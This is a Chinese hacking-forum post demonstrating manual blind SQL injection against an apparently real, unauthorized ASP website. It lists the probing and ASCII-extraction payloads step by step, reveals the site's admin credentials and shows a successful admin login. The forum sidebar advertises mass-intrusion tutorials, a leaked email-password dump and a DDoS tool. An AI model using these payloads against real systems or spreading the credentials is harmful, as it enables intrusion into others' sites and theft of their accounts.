HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: admin
查看: 2341|回复: 2

主题标签Tag

more +随机图赏Gallery

二期公开课第26节-CMS漏洞利用(phpweb)二期公开课第26节-CMS漏洞利用(phpweb)
福利 kali linux 全套 20G 黑客渗透福利 kali linux 全套 20G 黑客渗透
发放福利:百度云不限速版发放福利:百度云不限速版
二期公开课第21节-论找后台二期公开课第21节-论找后台
2015最新网站批量入侵教程-菜鸟也入侵2015最新网站批量入侵教程-菜鸟也入侵
DOS命令(可以转载)DOS命令(可以转载)
二期公开课第11节-MySQL5注入之写马拿webshell二期公开课第11节-MySQL5注入之写马拿webshell
社工库资源:某易邮箱 52g账号密码,快来拿社工库资源:某易邮箱 52g账号密码,快来拿
二期公开课第17节 - 数据库备份+突破二期公开课第17节 - 数据库备份+突破
福利来了:cc攻击器+IP代理工具福利来了:cc攻击器+IP代理工具

对一个小站进行的asp手工注入演示

[复制链接]
admin 发表于 2014-10-17 21:57:55 | 显示全部楼层 |阅读模式
查看: 2341|回复: 2

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
对一个小站进行的asp手工注入演示
                                                        
image001.png
点开一个链接
image003.png
在地址栏输入一个单引号 ,是英文输入法下的单引号
image005.png
报错。
再分别加入 and 1=1 and 1=2 分别返回正常,和返回错误
image007.png
image009.png
可以判断出该网站存在注射漏洞,下面在地址栏输入我们的注入代码,order by 是判断字段长度,当order by 5的时候返回正常,说明字段长度为5,接下来猜测有哪些表名,andexists (select * from admin)
image011.png
返回正常,说明存在admin表,接下来猜测admin表中有什么字段,分别输入 and exists (selectusername from admin)and exists (select password from admin)
image013.png
image015.png
都返回正常,说明admin表里面有usernamepassword字段,下面来爆出显示位,
And 1=2 union select 1,2,3,4,5 from admin
image017.png
显示的是错误页面,说明不支持unionselect 查询,不支持 unionselect.那就使用Ascii逐字解码法
and (select top 1 len(字段名) from 表名)>0  大于号后面的数字是可以变的是用来判断字段名的长度,所以and (select top 1 len(username) from admin)>0,当and (select top 1 len(username)from admin)>4的时候返回正常,而and(select top 1 len(username) from admin)>5的时候返回错误,说明username这个字段长度为5
image019.png
image021.png
下面还用这个方法来判断password字段的长度。
and (selecttop 1 len(password) from admin)>5的时候返回正常页面
and (selecttop 1 len(password) from admin)>6的时候返回错误页面
说明password这个字段的长度为6
image023.png
image025.png
好的,现在两个字段的长度我们都判断出来了,那接下来来判断两个字段中每个字符的ASCII码值是多少,判断出ASCII码值是多少了,这个字符具体是什么我们就可以知道了,下面继续演示,截取字段中的某个字符,并得到该字符的ASCII码,使用的语句:and(select top 1 asc(mid(字段名,N,1)) from 表名)>0N是可以变的,是用来表示第几个字符。
所以接下来,and(select top 1 asc(mid(username,1,1)) from admin)>0,当输入
and (select top 1 asc(mid(username,1,1))from admin)>96的时候返回正常>97的时候返回错误,说明username这个字段中的第一个字符的ASCII码值为97,依此类推。
and (select top 1 asc(mid(username,2,1))from admin)>99正常
and (select top 1 asc(mid(username,2,1))from admin)>100错误 说明第二个字符的ASCII值为100
and (select top 1 asc(mid(username,3,1))from admin)>108正常
and (select top 1 asc(mid(username,3,1))from admin)>109错误 说明第三个字符的ASCII值为109
and (select top 1 asc(mid(username,4,1))from admin)>104正常
and (select top 1 asc(mid(username,4,1))from admin)>105错误 说明第三个字符的ASCII值为105
and (select top 1 asc(mid(username,5,1))from admin)>109正常
and (select top 1 asc(mid(username,5,1))from admin)>110错误 说明第四个字符的ASCII值为110
至此username字段中的所有字符的ASCII值全都出来了分别是 97 100 109 105 110
去百度找个ASCII表来对一下,能得出username的值为admin
判断password的方法跟上面一样,我就不演示了。能得出password的值为dht168
在网址后面加上一个admin就是后台,一般后台基本都是admin/login.asp
或者manage/login.asp  admin_login.asp等等
image027.png
用刚才猜出的账户密码来登陆看看
image029.png
成功登陆.

lawlala 发表于 2017-1-8 13:54:42 | 显示全部楼层
学习,谢谢!
Aronxcs 发表于 2017-3-27 19:04:36 | 显示全部楼层
涨姿势了    耶耶耶耶耶耶耶
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-4-29 19:20 , Processed in 0.050155 second(s), 28 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.